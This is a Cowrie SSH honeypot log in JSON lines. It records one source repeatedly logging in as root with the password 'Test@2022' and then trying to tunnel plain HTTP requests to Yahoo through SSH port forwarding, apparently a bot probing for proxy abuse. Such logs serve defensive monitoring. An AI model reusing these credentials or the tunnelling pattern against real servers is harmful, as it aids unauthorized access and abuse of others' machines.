{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":3272,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:3272","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.299133Z","session":"690fd2040372"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.355963Z","src_ip":"213.209.150.239","session":"690fd2040372"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.413511Z","src_ip":"213.209.150.239","session":"690fd2040372"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32648,"dst_ip":"1.2.3.4","dst_port":22,"session":"f648df803836","protocol":"ssh","message":"New connection: 213.209.150.239:32648 (1.2.3.4:22) [session: f648df803836]","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.459404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.460134Z","src_ip":"213.209.150.239","session":"f648df803836"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.507170Z","src_ip":"213.209.150.239","session":"f648df803836"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.741930Z","src_ip":"213.209.150.239","session":"f648df803836"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":25286,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25286","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.790171Z","session":"f648df803836"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.837571Z","src_ip":"213.209.150.239","session":"f648df803836"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":8160,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8160","sensor":"my-vps","timestamp":"2025-08-26T01:04:41.973463Z","session":"f648df803836"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.020773Z","src_ip":"213.209.150.239","session":"f648df803836"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.069042Z","src_ip":"213.209.150.239","session":"f648df803836"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32696,"dst_ip":"1.2.3.4","dst_port":22,"session":"52abe95aacdc","protocol":"ssh","message":"New connection: 213.209.150.239:32696 (1.2.3.4:22) [session: 52abe95aacdc]","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.115612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.116758Z","src_ip":"213.209.150.239","session":"52abe95aacdc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.163758Z","src_ip":"213.209.150.239","session":"52abe95aacdc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.400067Z","src_ip":"213.209.150.239","session":"52abe95aacdc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20256,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20256","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.448488Z","session":"52abe95aacdc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.496138Z","src_ip":"213.209.150.239","session":"52abe95aacdc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10393,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10393","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.633648Z","session":"52abe95aacdc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.681233Z","src_ip":"213.209.150.239","session":"52abe95aacdc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.730956Z","src_ip":"213.209.150.239","session":"52abe95aacdc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32746,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f1d7bb95865","protocol":"ssh","message":"New connection: 213.209.150.239:32746 (1.2.3.4:22) [session: 6f1d7bb95865]","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.786811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.787772Z","src_ip":"213.209.150.239","session":"6f1d7bb95865"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:42.844879Z","src_ip":"213.209.150.239","session":"6f1d7bb95865"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.127528Z","src_ip":"213.209.150.239","session":"6f1d7bb95865"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16501,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16501","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.184902Z","session":"6f1d7bb95865"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.241858Z","src_ip":"213.209.150.239","session":"6f1d7bb95865"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":25415,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25415","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.395435Z","session":"6f1d7bb95865"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.453168Z","src_ip":"213.209.150.239","session":"6f1d7bb95865"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.511199Z","src_ip":"213.209.150.239","session":"6f1d7bb95865"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32854,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b4f3adc1006","protocol":"ssh","message":"New connection: 213.209.150.239:32854 (1.2.3.4:22) [session: 6b4f3adc1006]","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.557256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.558348Z","src_ip":"213.209.150.239","session":"6b4f3adc1006"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.605824Z","src_ip":"213.209.150.239","session":"6b4f3adc1006"}
{"eventid":"cowrie.session.closed","duration":12.267869234085083,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.775798Z","src_ip":"138.19.27.144","session":"add615d901ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.841291Z","src_ip":"213.209.150.239","session":"6b4f3adc1006"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":12783,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12783","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.890780Z","session":"6b4f3adc1006"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:43.938421Z","src_ip":"213.209.150.239","session":"6b4f3adc1006"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24978,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24978","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.073687Z","session":"6b4f3adc1006"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.121289Z","src_ip":"213.209.150.239","session":"6b4f3adc1006"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.169707Z","src_ip":"213.209.150.239","session":"6b4f3adc1006"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":32941,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa451d0d633c","protocol":"ssh","message":"New connection: 213.209.150.239:32941 (1.2.3.4:22) [session: fa451d0d633c]","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.215989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.216675Z","src_ip":"213.209.150.239","session":"fa451d0d633c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.263935Z","src_ip":"213.209.150.239","session":"fa451d0d633c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.499254Z","src_ip":"213.209.150.239","session":"fa451d0d633c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26746,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26746","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.547289Z","session":"fa451d0d633c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.594554Z","src_ip":"213.209.150.239","session":"fa451d0d633c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26334,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26334","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.729888Z","session":"fa451d0d633c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.777412Z","src_ip":"213.209.150.239","session":"fa451d0d633c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.825878Z","src_ip":"213.209.150.239","session":"fa451d0d633c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":33017,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea269ba3a503","protocol":"ssh","message":"New connection: 213.209.150.239:33017 (1.2.3.4:22) [session: ea269ba3a503]","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.872329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:44.873284Z","src_ip":"213.209.150.239","session":"ea269ba3a503"}
